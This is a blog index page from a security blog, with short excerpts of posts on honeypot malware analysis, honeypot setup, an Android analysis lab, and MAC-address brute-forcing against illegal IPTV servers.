Blog | CyberForge

Catching hackers with a honeypot - Case study

March 2, 2025 · 11 min read

Orkanyx

Creator of Cyberforge

Getting the sample

For this first case study, we'll base our analysis on a sample obtained by Cowrie. This sample can be found in the tpot installation folder, then in /data/cowrie/downloads/.

warning

The samples are malicious files. Handle them with caution. Always in a vm without internet connection

info

This first case study concerns a .sh file executed by a malicious actor to establish a botnet.

Hash: b6ba24ff7f1b3a851fe896136086f39c7d11db7f60223cf87a4fe029469ce776
Virustotal link: https://www.virustotal.com/gui/file/b6ba24ff7f1b3a851fe896136086f39c7d11db7f60223cf87a4fe029469ce776 (38/59)

Catching Hackers with a Honeypot - Installation

February 2, 2025 · 8 min read

Orkanyx

Creator of Cyberforge

We have always been told that in cybersecurity, attackers are always one step ahead. They will use vulnerabilities and/or techniques that defenders know nothing about.

Thus, to reduce this gap, defenders have found a method that allows them to both protect themselves and understand the new techniques used by attackers. This method is called a honeypot.

A honeypot is a system, intentionally left vulnerable and easily accessible by attackers. The objective is to collect IOCs (Indicators of Compromise) and IOAs (Indicators of Attack) to understand the techniques used by attackers.

In this article, we will discuss the deployment of the Tpot solution created by Deutsche Telekom:

How to create an Android lab in order to analyse Android applications

September 17, 2024 · 9 min read

Orkanyx

Creator of Cyberforge

Introduction

Creating an Android lab for dynamic and static analysis of android applications is a crucial step for security researchers and developers looking to analyze and improve the security of mobile applications. This guide will provide you with detailed steps to set up a secure and effective testing environment, using tools like Frida, Magisk, and other essential resources. Creating an Android lab for dynamic and static analysis of android applications is a crucial step for security researchers and developers looking to analyze and improve the security of mobile applications. This guide will provide you with detailed steps to set up a secure and effective testing environment, using tools like Frida, Magisk, and other essential resources.

The brute-forcing of virtual MAC addresses, the thorn in the side of illegal IPTV servers.

August 16, 2024 · 8 min read

Orkanyx

Creator of Cyberforge

Introduction

On July 14, 2024, DAZN, a sports streaming service, acquired the rights to Ligue 1 for 400 million euros.

It offers supporters 2 subscription plans, including one at €30 per month with a 12-month commitment (to watch all Ligue 1 matches except 1 match broadcast by Bein).

Thus, the French supporter must spend €45 per month just to watch Ligue 1. There is no need to continue to prove that this system will not work. Especially since DAZN requires 1.5 million subscribers to be profitable.

Using IPTV is therefore an alternative for these supporters, who are burdened with increasingly high costs each year to watch their favorite team.

This article aims to explore how IPTV works, as well as its server and connection/authentication methods.

Getting the sample​

Introduction​

Introduction​

Getting the sample

Introduction

Introduction